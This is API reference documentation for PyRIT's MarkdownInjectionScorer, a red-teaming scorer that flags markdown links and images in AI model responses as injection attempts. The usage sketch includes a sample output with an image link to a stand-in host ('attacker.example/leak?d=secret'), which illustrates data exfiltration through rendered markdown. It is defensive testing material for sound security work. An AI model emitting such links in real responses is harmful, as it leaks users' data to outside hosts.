pyrit.score.MarkdownInjectionScorer

class MarkdownInjectionScorer(*, validator: pyrit.score.scorer_prompt_validator.ScorerPromptValidator | None = None, score_aggregator: typing.Callable[[typing.Iterable[pyrit.models.score.Score]], pyrit.score.score_aggregator_result.ScoreAggregatorResult] = <function _create_aggregator.<locals>.aggregator>)

Bases: TrueFalseScorer

A scorer that detects markdown injection attempts in text responses.

This scorer checks for the presence of markdown syntax patterns that could be used for injection attacks, such as links, images, or other markdown constructs that might be exploited. Returns True if markdown injection is detected.
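
A minimal usage sketch follows (not part of the generated reference). It assumes only what this page documents: the class can be constructed with defaults and exposes score_text_async, which returns a list of Score objects; reading the true/false result with get_value() is an assumption about the Score model, not stated on this page.

import asyncio

from pyrit.score import MarkdownInjectionScorer


async def main() -> None:
    scorer = MarkdownInjectionScorer()

    # Model output containing a markdown image link, a common exfiltration vector.
    suspicious_text = "Done. ![tracker](https://attacker.example/leak?d=secret)"

    # For a true/false scorer, each returned Score is expected to carry a boolean value.
    scores = await scorer.score_text_async(suspicious_text)
    for score in scores:
        print(score.get_value())


asyncio.run(main())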

__init__(*, validator: pyrit.score.scorer_prompt_validator.ScorerPromptValidator | None = None, score_aggregator: typing.Callable[[typing.Iterable[pyrit.models.score.Score]], pyrit.score.score_aggregator_result.ScoreAggregatorResult] = <function _create_aggregator.<locals>.aggregator>) → None

Methods

__init__(*[, validator, score_aggregator])

get_identifier()
    Returns an identifier dictionary for the scorer.

get_scorer_metrics(dataset_name[, metrics_type])
    Returns evaluation statistics for the scorer, using the dataset_name of the human-labeled dataset that this scorer was run against.

scale_value_float(value, min_value, max_value)
    Scales a value from 0 to 1 based on the given min and max values (see the sketch after this list).

score_async(request_response, *[, ...])
    Score the request_response, add the results to the database, and return a list of Score objects.

score_image_async(image_path, *[, objective])
    Scores the given image using the chat target.

score_image_batch_async(*, image_paths[, ...])

score_prompts_batch_async(*, request_responses)
    Score multiple prompts in batches using the provided objectives.

score_response_async(*, response[, ...])
    Score a response using an objective scorer and optional auxiliary scorers.

score_response_multiple_scorers_async(*, ...)
    Score a response using multiple scorers in parallel.

score_text_async(text, *[, objective])
    Scores the given text based on the task using the chat target.

validate_return_scores(scores)
    Validates the scores returned by the scorer.
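
As referenced in the scale_value_float entry above, a brief sketch: the exact formula is not stated on this page, so the expected output below assumes a plain linear normalization, (value - min_value) / (max_value - min_value).

from pyrit.score import MarkdownInjectionScorer

scorer = MarkdownInjectionScorer()

# Assuming linear normalization, a 4-out-of-5 rating maps to 0.75.
print(scorer.scale_value_float(4.0, 1.0, 5.0))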

Attributes

scorer_type